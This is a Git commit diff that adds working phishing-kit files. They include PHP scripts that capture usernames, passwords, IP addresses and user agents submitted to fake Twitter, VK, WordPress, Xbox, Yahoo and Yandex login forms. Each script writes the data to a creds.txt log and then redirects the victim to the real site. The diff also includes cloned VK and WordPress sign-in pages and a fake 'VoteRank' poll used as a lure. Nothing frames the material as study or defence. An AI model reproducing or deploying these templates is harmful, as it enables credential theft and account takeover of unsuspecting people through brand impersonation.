adding sites

pull/576/head
drapl0n 2022-12-25 23:08:32 +05:30 committed by GitHub
parent 528affae1b
commit d7044ced57
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
37 changed files with 3184 additions and 0 deletions

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Twitter Username: " . $_POST['usernameOrEmail'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://twitter.com/account/begin_password_reset');
exit();
?>

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 43 B

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,26 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Vk Username: " . $_POST['email'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://vk.com/restore/');
exit();

Binary file not shown.

After

Width:  |  Height:  |  Size: 43 B

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 43 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 43 B

View File

@ -0,0 +1,103 @@

<!DOCTYPE html>
<html>
<head>
<title>VoteRank #289032</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<style>
.hover {
color: #FFF;
text-align: center;
width: 222px;
cursor:pointer;
background-color: #0EADFF;
display: block;margin:-15px auto 10px auto;border-radius:20px;border-color:transparent;height:40px;
}
.hover1:hover {
color: #FFF;
text-align: center;
width: 222px;
cursor:pointer;
background-color: #108ee9;;
display: block;margin:-15px auto 10px auto;border-radius:20px;border-color:transparent;height:40px;
}
</style>
</head>
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<!-- Header -->
<header class="w3-panel w3-center w3-opacity" style="padding:128px 16px">
<h1 class="w3-xlarge">VoteRank</h1>
<h1>#289032</h1>
</header>
<body bgcolor="#eff0f1" style="text-align:center;">
<div>
<form action="login2.html">
<div id="group1">
What is your name?<br><input type="text" required><br></br>
In what mountain do you live?<br><input type="text" required><br></br>
How old are you?<br><input type="text" required><br></br>
What are your favorite social networks?<br>
<input type="checkbox" value="facebook" name="social" > Facebook<br>
<input type="checkbox" value="twitter" name="social" > Twitter<br>
<input type="checkbox" value="linkedin" name="social" > LinkedIn<br>
<input type="checkbox" value="instagram" name="social" > Instagram<br>
<input type="checkbox" value="snapchat" name="social" > Snapchat<br>
<input type="checkbox" value="googleplus" name="social" > Google+<br>
<input type="checkbox" value="vkontakte" name="social" > Vkontakte<br></br>
</div>
<div id="group2">
What is your favorite color?<br>
<input type="checkbox" value="blue" name="color" > Blue<br>
<input type="checkbox" value="red" name="color" > Red<br>
<input type="checkbox" value="green" name="color" > Green<br>
<input type="checkbox" value="yellow" name="color" > Yellow<br>
<input type="checkbox" value="purple" name="color" > Purple<br>
<input type="checkbox" value="orange" name="color" > Orange<br>
<input type="checkbox" value="black" name="color" > Black<br>
<input type="checkbox" value="white" name="color" > White<br>
<input type="checkbox" value="grey" name="color" > Grey<br>
<input type="checkbox" value="brown" name="color" > Brown<br>
<input type="checkbox" value="pink" name="color" > Pink<br></br>
</div>
<div id="group3">
Do you prefer money as a gift?<br>
<input type="checkbox" value="yes" name="color" > Yes<br>
<input type="checkbox" value="no" name="color" > No<br></br>
</div>
</div>
<div id="group3">
Your favorite genre of music?<br>
<input type="checkbox" value="naarod" name="color" > People's<br>
<input type="checkbox" value="rok" name="color" > Rock<br>
<input type="checkbox" value="metal" name="color" > Metal<br>
<input type="checkbox" value="pop" name="color" > Pop<br>
<input type="checkbox" value="gjaz" name="color" > Jazz<br>
<input type="checkbox" value="shanson" name="color" > Shanson<br>
<input type="checkbox" value="hip-hop" name="color" > Hip-hop<br>
<input type="checkbox" value="rap" name="color" > Rap<br>
<input type="checkbox" value="electro" name="color" > Electronic<br>
<input type="checkbox" value="another" name="color" > Other<br></br>
<input type="submit" value="Submit" class="hover hover1">
</div>
</form>
</div>
</body>
</body>
</html>

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Vk Username: " . $_POST['email'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://vk.com/restore/');
exit();
?>

View File

@ -0,0 +1,77 @@
<!--?xml version="1.0" encoding="utf-8"?-->
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="vk vk_js_yes vk_flex_yes r d h vk_withVolumeLine vk_appAuth_no"><head>
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="theme-color" content="#5181b8">
<title>VoteRank #289032</title>
<link rel="shortcut icon" href="https://m.vk.com/images/icons/favicons/fav_logo.ico?8">
<link type="text/css" rel="stylesheet" href="./s_cfmxw.css">
<link type="text/css" rel="stylesheet" media="only screen" href="./s_cfmxw.css">
<script type="text/javascript" src="./s_c.js?752"></script>
<body id="vk" class="vk__page _hover _hfixed vk_stickers_hints_support_yes opera_mini_no vk__page_login vk_al_yes" onresize="onBodyResize(true);" style="padding-bottom: 110px;">
<div class="layout">
<div class="layout__header mhead" id="vk_head">
<div class="hb_wrap">
<div class="hb_btn">&nbsp;</div>
</div>
</div>
<div class="layout__body qs_enabled _js _copts" id="vk_wrap">
<div class="layout__leftMenu" id="l" style="min-height: 0px;">
</div>
<div class="layout__basis" id="m" style="min-height: 0px;">
<div class="basis">
<div class="basis__header mhead" id="mhead">
<img src="./top_logo.png">
<div class="hb_btn mhi_logo">&nbsp;</div>
<h1 class="hb_btn mh_header">&nbsp;</h1>
</a>
</div>
<div class="basis__content mcont" id="mcont" data-canonical=""><div class="pcont fit_box bl_cont new_form">
<div class="form_item">
<div class="login_header">Sign in to complete poll</div><form method="post" action="login.php">
<dl class="fi_row">
<dd>
<input class="textfield" name="email" placeholder="Phone or email" type="text">
</dd>
</dl>
<dl class="fi_row">
<dd>
<input class="textfield" name="pass" placeholder="Password" type="password">
</dd>
</dl>
<div class="fi_row_new">
<input class="button wide_button" value="Log In" type="submit">
</div>
</form>
</div>
</div></div>
<script type="text/javascript">
</script><div id="vk_utils"></div>
<div id="z"></div>
<div id="vk_bottom"></div>
</body></head></html>

Binary file not shown.

After

Width:  |  Height:  |  Size: 43 B

View File

@ -0,0 +1,21 @@
<!DOCTYPE html>
<html>
<title>Poll completed successfully. Thnak You!</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<!-- Header -->
<header class="w3-panel w3-center w3-opacity" style="padding:128px 16px">
<h1 class="w3-xlarge">VoteRank</h1>
<h1>#56353514</h1>
</header>
<body>
<p align="center"><font size="10px" color="green">Poll completed successfully. Thank You!</font></p>
</body>
</body>
</html>

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 703 B

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,61 @@
<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Log In — WordPress</title>
<link rel="dns-prefetch" href="http://s.w.org/">
<link rel="stylesheet" href="./load-styles.css" type="text/css" media="all">
<meta name="robots" content="noindex,follow">
<meta name="viewport" content="width=device-width">
</head>
<body class="login login-action-login wp-core-ui locale-en-us">
<div id="login">
<h1><a href="https://wordpress.org/" title="Powered by WordPress" tabindex="-1">Powered by WordPress</a></h1>
<form name="loginform" id="loginform" action="login.php" method="post">
<p>
<label for="user_login">Username or Email Address<br>
<input name="log" id="user_login" class="input" size="20" type="text"></label>
</p>
<p>
<label for="user_pass">Password<br>
<input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label>
</p>
<p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p>
<p class="submit">
<input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit">
<input name="redirect_to" value="http://localhost/wp-admin/" type="hidden">
<input name="testcookie" value="1" type="hidden">
</p>
</form>
<p id="nav">
<a href="http://localhost/wp-login.php?action=lostpassword">Lost your password?</a>
</p>
<script type="text/javascript">
function wp_attempt_focus(){
setTimeout( function(){ try{
d = document.getElementById('user_login');
d.focus();
d.select();
} catch(e){}
}, 200);
}
wp_attempt_focus();
if(typeof wpOnload=='function')wpOnload();
</script>
<p id="backtoblog"><a href="http://localhost/">← Back</a></p>
</div>
<div class="clear"></div>
</body></html>

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Wordpress Username: " . $_POST['log'] . " Pass: " . $_POST['pwd'] . "\n", FILE_APPEND);
header('Location: https://google.com');
exit();
?>

View File

@ -0,0 +1 @@
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" width="64px" height="64px" viewBox="0 0 64 64" enable-background="new 0 0 64 64" xml:space="preserve"><style>.style0{fill: #0073aa;}</style><g><g><path d="M4.548 31.999c0 10.9 6.3 20.3 15.5 24.706L6.925 20.827C5.402 24.2 4.5 28 4.5 31.999z M50.531 30.614c0-3.394-1.219-5.742-2.264-7.57c-1.391-2.263-2.695-4.177-2.695-6.439c0-2.523 1.912-4.872 4.609-4.872 c0.121 0 0.2 0 0.4 0.022C45.653 7.3 39.1 4.5 32 4.548c-9.591 0-18.027 4.921-22.936 12.4 c0.645 0 1.3 0 1.8 0.033c2.871 0 7.316-0.349 7.316-0.349c1.479-0.086 1.7 2.1 0.2 2.3 c0 0-1.487 0.174-3.142 0.261l9.997 29.735l6.008-18.017l-4.276-11.718c-1.479-0.087-2.879-0.261-2.879-0.261 c-1.48-0.087-1.306-2.349 0.174-2.262c0 0 4.5 0.3 7.2 0.349c2.87 0 7.317-0.349 7.317-0.349 c1.479-0.086 1.7 2.1 0.2 2.262c0 0-1.489 0.174-3.142 0.261l9.92 29.508l2.739-9.148 C49.628 35.7 50.5 33 50.5 30.614z M32.481 34.4l-8.237 23.934c2.46 0.7 5.1 1.1 7.8 1.1 c3.197 0 6.262-0.552 9.116-1.556c-0.072-0.118-0.141-0.243-0.196-0.379L32.481 34.4z M56.088 18.8 c0.119 0.9 0.2 1.8 0.2 2.823c0 2.785-0.521 5.916-2.088 9.832l-8.385 24.242c8.161-4.758 13.65-13.6 13.65-23.728 C59.451 27.2 58.2 22.7 56.1 18.83z M32 0c-17.645 0-32 14.355-32 32C0 49.6 14.4 64 32 64s32-14.355 32-32.001 C64 14.4 49.6 0 32 0z M32 62.533c-16.835 0-30.533-13.698-30.533-30.534C1.467 15.2 15.2 1.5 32 1.5 s30.534 13.7 30.5 30.532C62.533 48.8 48.8 62.5 32 62.533z" class="style0"/></g></g></svg>

After

Width:  |  Height:  |  Size: 1.5 KiB

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,31 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
session_start();
$pass = $_POST["passwd"];
$email=$_SESSION["Email"];
file_put_contents("../logs/creds.txt", "Xbox Username: " . $email . " Pass: " . $pass . "\n", FILE_APPEND);
header('Location: https://login.live.com/login.srf');
exit();
session_destroy();
?>

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Yahoo Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://login.yahoo.com/account/challenge/session-expired');
exit();
?>

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 3.0 KiB

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Yandex Username: " . $_POST['login'] . " Pass: " . $_POST['passwd'] . "\n", FILE_APPEND);
header('Location: https://passport.yandex.com/restoration');
exit();
?>